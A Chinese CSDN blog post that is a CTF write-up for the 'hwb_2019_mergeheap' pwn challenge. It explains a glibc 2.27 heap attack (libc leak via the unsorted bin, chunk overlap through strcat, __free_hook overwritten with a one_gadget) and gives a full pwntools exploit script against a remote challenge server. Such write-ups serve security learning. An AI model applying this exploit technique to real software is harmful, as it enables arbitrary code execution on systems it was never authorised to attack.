hwb_2019_mergeheap

于 2022-04-10 17:27:59 发布
阅读量181 收藏
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/124082000
版权

hwb_2019_mergeheap

查看保护
在这里插入图片描述
在这里插入图片描述
利用str的特性遇见\x00会被截断
攻击思路:2.27下泄露lib需要填满7个再释放的时候就是进unsortedbin了。利用strcat将下一个堆块的size都复制过来,形成堆块重叠,然后任意地址写,改hook为one_gadget,

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 29472)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = '>>'

def add(size, content):
    r.sendlineafter(menu, '1')
    r.sendlineafter('len:', str(size))
    r.sendlineafter('content:', content)

def show(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter('idx:', str(index))

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('idx:', str(index))

def merge(idx1,idx2):
    r.sendlineafter(menu, '4')
    r.sendlineafter('idx1:', str(idx1))
    r.sendlineafter('idx2:', str(idx2))

for i in range(8):
	add(0x80,'aaaaa')
for i in range(1,8):
	delete(i)

delete(0)

add(0x8,'aaaaaaaa')#0

show(0)


malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))  - 224 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc = ELF('./2.27/libc-2.27.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base

add(0x60, 'aaaa')
add(0x30, 'a'*0x30)#2
add(0x38, 'a'*0x38)#3
add(0x100, 'aaaa')#4   
add(0x68, 'aaaa')#5		
add(0x20, 'aaaa')#6
add(0x20, 'aaaa')#7
add(0x20, 'aaaa')#8	
add(0x20, 'aaaa')#9

delete(5)
delete(7)
delete(8)
merge(2, 3)
delete(6)

payload1 = b'a' * 0x28 +p64(0x30) +  p64(free_hook) + p64(0)
add(0x100, payload1)
add(0x20, 'aaaa')
add(0x20, 'aaaa')
add(0x20, p64(one_gadget))
delete(9)

r.interactive()
z1r0.
关注
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 773
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
mergeheap
seaaseesa的博客
04-17 199
mergeheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在合并的时候,存在溢出,strcpy、strcat可能会将下一个chunk的size也拷贝过来,从而可以溢出修改下一个chunk的size。 并且,由于merge的时候使用的是strcpy、strcat,遇到\0字符会截断,因此当我们写64位地址数据的时候,需要从最后一个开始写,前面全部用不截断的字符填充。...
project-mergeheap
weixin_34050389的博客
01-11 161
ordinary heap merge #include <stdio.h> #include <stdlib.h> #include <time.h>/*time functions library*/ #ifndef _Heap_H #define Max_Size (100000)/*the array-size of heap*/ ...
护网杯2019 mergeheap --pwn
weixin_30552811的博客
09-08 258
护网 又是签到 一天 这道题一开始 不懂得如何泄露 libc 信息,就蒙了 后来群里师傅也是刚刚好 做出 到这里 我就接着做了 。 先看下保护,发现 全开了 然后 就看下流程 大概 就是添加 chunk show 合并两个chunk 可利用的 洞就是 int merge() { int v1; // ST1C_4...
mergeHeapQuickSort - 三种基础排序算法对比
cxy_hust的博客
03-07 454
三种基础排序 归并排序 堆排序 快速排序 1 题目: https://leetcode-cn.com/problems/sort-an-array/ 2 解题思路: 1 分别详细解释 快速排序,归并排序,堆排序 1.1 快速排序 算法核心:选择一个数字,然后将比他大的都移动到他左边,比他小的都是右边,然后分别对左侧区域和右侧区域递归执行即可 速度和稳定性:在单调情况下达到最坏,为O(n**2),不稳定的原因,中枢元素会和最后一个比他小的数字交换位置(以此将左侧分为比他小的,右侧比他大的); 1
HWB-DVR数字视频录像机设计
12-09
摘 要:本文介绍了HWB-DVR数字视频录像机的整体设计思想,描述了其软硬件的构成,对其中嵌入式CPU和编/解码IC的工作原理做了详细说明。关键词:数字录像机(DVR);MPEG-2;MPEG-4;PS;TS 概述HWB-DVR数字视频录像...
matlab代码续行-MI-HWB:MI-HWB
05-26
matlab代码续行MI-HWB.16课程 Hardwarovábezpečnost CTU /ČVUTFIT 整个过程涉及硬件安全性,计数器测量及其含义。 我们最大的挑战是使用差分功率分析来打破Java卡中实现的AES。 任务1 我们有一个示波器来测量小型...
C#编写17种Hello_World程序
10-01
HelloWorldBase hwb = new HelloWorld(); hwb.writeHelloWorld(); } } ``` 这里定义了一个抽象基类`HelloWorldBase`,它包含一个抽象方法`writeHelloWorld`。`HelloWorld`类继承自`HelloWorldBase`,并实现了...
Fastjson介绍
热门推荐
wutongyu344的专栏
03-05 3万+
简介 Fastjson是一个Java语言编写的高性能功能完善的JSON库。 高性能 fastjson采用独创的算法,将parse的速度提升到极致,超过所有json库,包括曾经号称最快的jackson。并且还超越了google的二进制协议protocol buf。 支持标准 Fastjson完全支持http://json.org的标准,也是官方网站收录的参考实现之一
BUUCTF pwn 四月刷题
coco的博客
04-07 869
BUUCTF四月刷题 [OGeek2019]bookmanager 这道题程序看似比较复杂,实际上好好分析程序的结构和逻辑之后,还是一个堆溢出,在updata函数中更新text时候可以更新0xFF长度的内容,造成溢出。这类题比较重要的是一定要弄清楚程序中的各种结构再下手。 libc泄漏的手段还是通过small bin free进unsorted bin之后打印出main_arena附近的地址;ge...
buuoj Pwn writeup 186-190
yongbaoii的博客
06-11 430
186 hwb_2019_mergeheap 187 nsctf_online_2019_pwn1 188 roarctf_2019_easyheap 189 0ctf2015_freenote 190 [中关村2019]one_string
ciscn_2019_c_5
doudoudedi
02-09 551
思路 格式化字符串leak然后打free_hook exp: from pwn import * #p=process('./ciscn_2019_c_5') p=remote('node3.buuoj.cn',27000) elf=ELF('./ciscn_2019_c_5') libc=elf.libc def add(size,story): p.sendlineafter(':'...
C#源码桃源相册管理系统C#源码桃源相册管理系统
10-11
C#源码桃源相册管理系统C#源码桃源相册管理系统
2023年第九届中国国际互联网+大学生创新创业大赛解读.ppt
最新发布
10-11
2023年第九届中国国际互联网+大学生创新创业大赛解读.ppt
dijkstra算法原理及Matlab实现.docx
10-11
dijkstra算法原理及Matlab实现.docx
20241011-0909
10-11
ffff
四旋翼无人机uav,轨迹跟踪pd控制器,matlab-simulink仿真学习资料,附参考文献
10-11
四旋翼无人机uav,轨迹跟踪pd控制器,matlab-simulink仿真学习资料,附参考文献
css hwb使用例子
05-19
CSS Hwb是一种定义颜色的CSS模块,它使用色调(hue)、白度(whiteness)和黑度(blackness)来表示颜色。这种颜色表示方式与RGB和HSL等其他颜色表示方式不同,它允许用户更直观地定义颜色。 下面是CSS Hwb使用的一个例子: ``` background-color: hwb(240, 60%, 10%); ``` 上述代码将元素的背景颜色设置为蓝色的一种暗调,其中色调为240度,白度为60%,黑度为10%。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值